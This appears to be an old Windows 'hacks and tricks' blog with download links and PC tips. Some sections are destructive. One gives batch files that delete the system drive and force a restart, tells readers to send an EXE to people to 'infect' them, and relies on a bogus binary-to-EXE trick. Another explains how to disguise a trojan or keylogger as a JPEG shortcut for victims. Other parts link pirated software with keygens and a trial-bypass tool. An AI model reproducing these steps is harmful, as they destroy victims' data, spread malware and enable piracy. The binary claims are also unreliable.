Thursday, March 18, 2010

1001 Ways To Be Romantic

http://hotfile.com/dl/32567069/0cee213/1001WSFS.rar.html

How to say I Love You in 100 Languages

http://hotfile.com/dl/31050719/515c37b/How_to_say_I_Love_You_in_100_Languages.rar.html

55 Way to Have Fun With Gg

http://hotfile.com/dl/31031555/ad8465d/FUnni.rar.html

Secrets Of Palmistry

http://rapidshare.com/files/255603744/Se0crets_Of_Pal99mistry.rar

1000 Greatest Windows Hidden Secret Tips

http://hotfile.com/dl/30780868/7f862ca/1000.Greatest.Wd.Hidden.Secret.Tips.rar.html

Folder Lock With Password Without Any Software

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.




if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

now do a lot of things with the Notepad

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.


Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.

To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.

The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)

Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.

Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.

shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.

Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.

In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-

shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s

Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.

When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.

You can use any combination of shutdown commands in a batch file.

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??
1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.
2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)
3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'
4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5) Now create a shortcut of this 'picture.jpeg' in the same folder.
6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.
7) Go to properties (on file me.jpeg) and now you need to do some changes there.
8) First of all delete all the text on field 'Start In' and leave it empty.
9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'
10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.
11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.
12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.
13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.
14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.
16) So the best way to send these files together to someone is compress them into Zip or Rar.
17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.
This trick will allow you to create files and folders without any name.

Just follow the steps as given below :-

1) Select any file or folder.

2) Right click on it, select 'Rename' or simply press 'F2'.

3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.

Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?
For this you will have to rename the file with 2 spaces.
Just follow the steps given below :-

1) Select file, Press 'F2'.

2) Hold 'Alt' key and type '0160' from the numpad.

3) Release the 'Alt' key. Now without doing anything else, again hold 'Alt' key and type '0160'.

4) Press 'Enter' and you will have second nameless file in the same directory.

5) Repeat step 3 to create as many nameless files or folders in the same directory.

(We have a problem with deleting these folders, to do so, start your computer in 'Safe Mode' and delete it from there.)
1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!



@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:


7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:


8) Now all you need to do is type your message and press Enter.
Start Chatting.......!
There are two hacks to beat Rapidshare download limits and waiting time.
1) Rapidshare Hack (For Firefox Users) :-
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.



http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi 2) Restart Firefox 3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html 4) Right click on rapidshare.user.js and choose "Install User Script". 5) Run FireFox. 6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active. 7) Click on it to install this plug-in then CLOSE FIREFOX. 8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'. 9) Open it. 10) Click the Tools Menu then click on Install User Script then click OK. 11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!

2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-
A] Short-Out the JavaScript:
1) Goto the page you want to download 2) Select FREE button 3) In the address bar put this- javascript:alert(c=0) 4) Click OK 5) Click OK to the pop-up box 6) Enter the captcha 7) Download Your File
B] Request a new IP address from your ISP server:
Here’s how to do it in windows: 1) Click Start 2) Click run 3) In the run box type cmd.exe and click OK 4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using. 6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.
C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox 2) Download and install SwitchProxy 3) Google for free proxies 4) When you hit your download limit, clean your cookies and change your proxy
D] You can use a bookmarklet to stop your wait times:
1) Open IE 2) Right Click On This Link 3) Select Add to Favorites 4) Select Yes to the warning that the bookmark may be unsafe. 5) Name it “RapidShare No Wait” 6) Click on the Links folder (if you want to display it in your IE toolbar) 7) Click OK 8) You may need to close and reopen IE to see it 9) Goto rapidshare and click the bookmarklet when you are forced to wait

Speed Up Acrobat to open it like notepad

Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.


1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy. Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad.

Put Your name in place of Date (AM/PM)

Try this trick to add up ur name in place of AM and PM beside time. Its simple


Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...


Did It change? If not, follow step-2 below.




Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY 8)

Increase your RAM there by Increase system speed

1). Start any application, say Word. Open some large documents.

2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.
In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

Remove Annoying Delete Confirmation Messages in Windows

Although not strictly a performance tweak I love this fix as it makes my machine 'feel' faster. I hate the annoying 'are you sure?' messages that XP displays, especially if I have to use a laptop touchpad to close them. To remove these messages:

1. Right-click on the 'Recycle Bin' on the desktop and then click 'Properties'

2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok'

If you do accidentally delete a file don't worry as all is not lost. Just go to your Recycle Bin and 'Restore' the file.

Enable Administrator at Welcome Screen

When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1. Open Control Panel
2. Open Administrative Tools
3. Open Local Security Policy
4. Expand Local Policies
5. Click on Security Options
6. Ensure that Accounts: Administrator account status is enabled.

Then follow the instructions from the "Win2000 Logon Screen Tweak" ie;
1.Open Control Panel
2. Open User Accounts
3. Click Change the way users log on or log off
4. Un-tick Use the Welcome Screen
5. Click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.


Another Method


By default windows XP doesn't show the Administrator in the user list at the welcome screen. Here's a way to get around it.
Now head up to HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\
Winlogon\SpecialAccounts\Userlist

create a new DWORD entry and name it as Administrator and change its value to 1.

exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.

Hack Windows Send To Menu

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

Remove Shortcut Arrow From Desktop Icons Completely

To remove shortcut arrow from desktop icons in any type of document:


a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.


b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.


c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.


So, here is a summary of all actions:


1. Start regedit.

2. Navigate to HKEY_CLASSES_ROOT\lnkfile

3. Delete the IsShortcut registry value.


4. Navigate to HKEY_CLASSES_ROOT\piffile

5. Delete the IsShortcut registry value.


6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink

7. Delete the IsShortcut registry value.

8. Navigate to HKEY_CLASSES_ROOT\DocShortCut

9. Delete the IsShortcut registry value.

10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut

11. Delete the IsShortcut registry value.

12. Navigate to HKEY_CLASSES_ROOT\WSHFile

13. Delete the IsShortcut registry value.


14. Close regedit.


Logoff and… Enjoy!


Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.

Pop A Banner Each Time Windows Boots

To pop a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.

Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Hide Entire Drives Partition Without Registry

Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.
1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.
DISKPART>
2) Then type "list volume"
The result will look something like one as shown below-




3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}
4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }

sometime it requires to reboot the computer.
Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".
It means type "assign letter E".

Increase Broadband Speed Using Simple Tweak

A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-
1) Click on Start Button.
2) Select Run From Start Menu.
3) Type gpedit.msc
4) Expand the [Administrative Templates] branch.
5) Then Expand the [Network] branch.
6) Highlight(Select by Single Click) [QoS Packet Scheduler]
7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)
8) Check(Select By Single Click on it) [Enabled]
9) Change [Bandwidth limit %] to 0 %
10) Click [OK] Button.
11) Restart Your PC.
12) Now Check Your Broadband Speed.

Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox.

Trick To Create An Ftp Server On Your PC

Process-1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside.


1) Goto no-ip & create urself a free account.


2) Now ur account been created & ll receive ur account password via mail to ur email address.


3) After getting ur password login to ur account of no-ip.com

4) After getting logged in, click upon add a HOST its on the left menu.


5) Type any hostname u want (eg:-abc) & select any domain from da given list (eg:-ftpserve.com) Click on Submit.


6) Now u have owned ur own static address (example: abc.serveftp.com)


7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users.


8) After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.


9) At last tick on da check box present at the static address.


10) U have ur own static web address.

Process-2:
Installation & setting of the FTP-Server


1) You have to install Serv-U 4.1.03 , download this software from here


2) Run Serv-U & use da wizard to setup ur FTP.


3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.


4) Enter ur domain name u have registered (example: abc.serveftp.com) it above in da domain field & click upon next.


5) U ll be asked for anonymous access, select No & click upon next.


6) Next u ll be asked for creating a named account, select yes & click upon next.


7) Choose any user name u wish (eg:-xyz) & clcik upon next.


8) Enter password for dis account (eg:-adc341) for security purpose choose difficult password.


9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.


10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.


11) At last ur account has been created click finish.

Process-3:
Configuring the user accounts which u have been created.


1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.


2) Goto Hide 'Hidden' Files.


3) Check Allow only and enter the number one in the box.


4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.


5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)


6) Click upon Dir Access Tab.


7) Now u can c home folder here.Highlight it & make ur permission.


8) If u want only users to download check only these Read,List & Inherit.


9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.


10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.


11) There are many things u can do, These are only the basics.


12) Your server is now ready to be connected.


13) Login with your username & password.

Improve Windows-XP Shutdown Speed

This tweak reduces the time Windows-XP waits before automatically closing any running programs when you give it the command to shutdown.

Follow the steps as given below-
1) Go to Start then select Run
2) Type 'Regedit' and click ok
3) Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'
4) Select 'WaitToKillAppTimeout'
5) Right click and select 'Modify'
6) Change the value to '1000'
7) Click 'OK'
8) Now select 'HungAppTimeout'
9) Right click and select 'Modify'
10) Change the value to '1000'
11) Click 'OK'

Saturday, January 24, 2009

Hidden Desktop 1.1.189

Hidden Desktop 1.1.189


How many times you are surfing the Internet and somebody unwanted (your boss, wife, children, curious work colleague?!?) suddenly captured your desktop view before you have enough time to close your applications with sensitive data. Not to mention that you maybe lost some important data because you forgot to save your work in rush to close those applications.

With Hidden Desktop you can hide all private applications and documents in a bit of second just pushing key on your computer’s keyboard. And not just hide. They will magically disappear form taskbar and sys-tray as they have never been there.

Once when danger past and your view is clear you can restore your applications without any loss and continue to work. Like you’ve never been interrupted. Again just push hot-key on your keyboard.



Moreover, you can even set password protection. If somebody knows about Hidden Desktop Software you can set up password by just entering it at the beginning of session and when you try to restore applications you will be asked to enter it again. If someone input wrong password nothing will happen and he/she will think there is nothing hidden. If you don’t need this feature leave password field blank.

Download Links

Code:
http://rapidshare.com/files/123674739/lsfdghgfds.rar

Wise Registry Cleaner Pro 3.20 build 110

Wise Registry Cleaner Pro 3.20 build 110


Wise Registry Cleaner speeds up your PC by cleaning your Registry. The Registry is at the heart of every Windows computer.
The older your PC is, the more junked-up its Registry becomes. Badly written programs (and there are plenty of those around) don't bother to clean the Registry when you uninstall them, and some programs add unnecessary junk to the Registry. The more junked-up your Registry, the more likely it is to crash or to slow down your PC.
This freebie does a neat job of cleaning out the Registry junk. It scans the Registry, flagging orphaned or bad Registry entries, and shows you the name and values for each. It identifies Registry entries that may be dangerous to delete, and those that are safe to delete, so you can distinguish between the two. It also lets you decide which entries to delete, and which to keep. For safety's sake, it can also back up your Registry before a scan, so that you can restore it, if the program causes any problems.



Download Links


Code:
http://w16.easy-share.com/1700100191.html

FantaMorph Professional Edition v3.7.1 with keygen

FantaMorph Professional Edition v3.7.1 with keygen

Play final morphing effects in real time without exporting to a file
Instanty morph one image into another!, cool animations!
Add unique pictures & animations to your web site, wallpaper, advertising, presentations, training materials, and cards.
Create pictures with shadows, reflection, and perspective
Animations with sound using multiple, textured 3D models on backgrounds with 3D effects
Animations with moving backgrounds and motion blur effects. 1,100+ models for users to download. Features: import function for VRML models
3D rotate, pan, and zoom
Shaded or polygon display
User defined transparency, colors, textures, motions, orientations, light position, and sounds
3D model editing
3D effects for 2D backgrounds
4 user selectable picture quality levels
user definition of depth & orientation for 3D models at arbitrary points on the animation path
special motion options including closed paths, circular paths, and rotations
depth specification for elements of backgrounds
functions for merging up to 30 model motions into realistic 3D movies with user-defined frame counts

Download Link


Code:
http://rapidshare.com/files/109962395/SWOFanta.exe

Microsoft GIF Animator

Microsoft GIF Animator


Microsoft GIF Animator
RARE Application!
This is a simple but very useful little application that's been
discontinued by Microsoft. It's one of the secret weapons in the
arsenal of web developer. You can use this program to make web GIF
animations or even decompile other people's GIF files.


Download Link


Code:
http://rapidshare.com/files/112620482/Microsoft_GIF_Animator.rar

TextAloud 2.285

TextAloud 2.285


Convert any text into voice and MP3 for PC or download to MP3 player
TextAloud is the leading text to speech program, available with exciting premium voices (including several languages) from ATT, Cepstral and NeoSpeech for the best in computer speech for your PC. TextAloud uses voice synthesis to convert text into spoken audio. TextAloud reads text from email, web pages, reports and more, aloud on your PC. TextAloud can also save your daily reading to MP3 or Windows Media files ready for playback on your iPod, PocketPC, or even on your TV with Tivo's Home Media Option.
What you can do with TextAloud:
• Sit back and relax while your PC reads to you
• Save text to MP3 for portable audio players
• Proofread your own writing
• Listen to that report while you're on the treadmill
• Find help for someone with a reading disability
• Create messages for your answering machine
• Reduce eye strain from too much reading
• Listen to information while you work on something else
• Take some reading along for your daily walk or run
• Turn your iPod into a tax write-off
• Listen to an eBook during your commute
• Study English as a Second Language
• Help a senior citizen or someone with low vision
• Add some spice to your PowerPoint presentations
• Find a great new tool to study for exams
• Listen to text read in other languages
• Amuse your kids by letting your PC read stories to them
• Create audio files for computer games
• Prepare for a big speech by hearing your words read aloud

Features at a glance:
• Single-Article and Multi-Article Mode for listening to articles one at a time, or building a playlist to listen to later.
• Load articles using the Clipboard, Document Import, Hot Keys and Drag and Drop.
• Support for Word, PDF and HTML documents.
• Support for multiple Text-To-Speech engines, including international voices.
• Support for WAV, MP3 and WMA audio files.
• Proofread tool for listening to documents as you proofread.
• Plugin toolbar for Internet Explorer to listen to web pages.

OS: Win 95/98/ME/NT/2000/XP/Vista

Size: 3.19 mb

Download Links


Code:
http://rapidshare.com/files/115847234/NextUp.TextAloud.v2.285.raror


Code:
http://w15.easy-share.com/1700411727.html

Classic Menu for Office 2007 v3.93 | MS Office 2007 Add-ins | 3.71 MB

Classic Menu for Office 2007 v3.93 | MS Office 2007 Add-ins | 3.71 MB


Frustrated by endless searches for features on the Ribbon? Download and install this software to bring back the familiar menus and toolbars to Microsoft® Office 2007. The software allows you to work with Office 2007 as if it were Office 2003.
This software includes Classic Menu for Word, Excel®, Access TM, Icon of Outlook Outlook® and PowerPoint® 2007. Gives you a smooth learning curve!
All the new features in Microsoft Office 2007 have been added into the Main Menu, the Standard Toolbar and Formatting Toolbar.
Download Links



Code:
http://w15.easy-share.com/1700418241.htmlor


Code:
http://rapidshare.com/files/116080057/Classic.Menu.for.Office.2007.rar

CrackLock v3.8.1

CrackLock v3.8.1


Forget the Trial ..... Program to stop the time the test programs.
This program basically serves to remove / delete the trial versions of the programs, what it does is make the program believe that the time of testing is not progressing, it is always the same. " CrackLock" is a program that allows us to indefinitely extend the probationary period of Shareware programs that have a time limit. It works by making the program believe that the date remains constant. Simple and effective.




Download:-


Code:
http://w16.easy-share.com/1700450221.html

600 Cool fonts (for webdesign)




600 Cool fonts (for webdesign)

Size : 11.7 Mb


Download:-


Code:
http://w14.easy-share.com/1700360140.html

DivX Pro 6.8 For Windows

DivX Pro 6.8 For Windows


DivX for Windows gives you everything you need to create and play high-quality DivX videos on your PC and beyond.


Download:-


Code:
http://rapidshare.com/files/98387021/DivX_Pro_6.8.rar

Face Recognition Login

Face Recognition Login

This tiny little tool allows you to login via your webcam!

BananaScreen adds face recognition login to your webcam-enabled Windows computer. To use, just install BananaScreen and create a face model. Then set up BananaScreen to lock after a predefined amount of inactivity (or hit Alt-L to lock at any time). Once locked, BananaScreen will keep an eye on faces coming and going in front of the camera. When it matches yours, it immediately unlocks your computer.



Download:-

Code:
http://rapidshare.com/files/90523644/face.rar

Game Accelerator 7.1

Game Accelerator 7.1

Game Accelerator is an all-in-one game optimization tool that allows you to play your games at the best level of performance possible.

To provide the gaming experience available, Game Accelerator is an all-in-one game optimization tool that allows you to run your games at the best possible performance by eliminating the performance and stability problems that make your games run slower than they should. This is done through easy one-click menu options that allow you to tailor your games to run faster based on your system hardware. The combination of optimization techniques used by Game Accelerator help significiantly improve your gaming experience, turning your computer into the ultimate gaming machine. Furthermore, to make your overall computer experience even smoother, an intelligent pop-up ad blocker is included to block those annoying spam pop-up and pop-under ads, as well as an easy-to-use system monitor taskbar that allows you to keep track of your computer?s health.

Benefits of Game Accelerator:-

? Simple and easy to use
? Full support for all the latest hardware technologies, such as the latest CPUs and graphics cards ? Special game optimisation settings for over 1000 games including, Half-Life? 2, Doom 3, World of Warcraft?, City of Heroes?, EverQuest, Brothers in Arms, Jedi Knight?: Jedi Academy, House of the Dead 3, and many more
? Quick access to the game optimisation tools through the system tray icon
? Slim system monitor taskbar
? Improves speed and performance
? Frees up memory to create a stable gaming environment
? Maximises frame rates and screen resolution
? Integrated laptop energy saving mode to keep your laptop running longer
? Easy configuration to suit your PC system
? Access to online program updates with Game Accelerator.

Download:-


Code:
http://rapidshare.com/files/91257475/411GA.rar

PDF Converter Pro

PDF Converter Pro

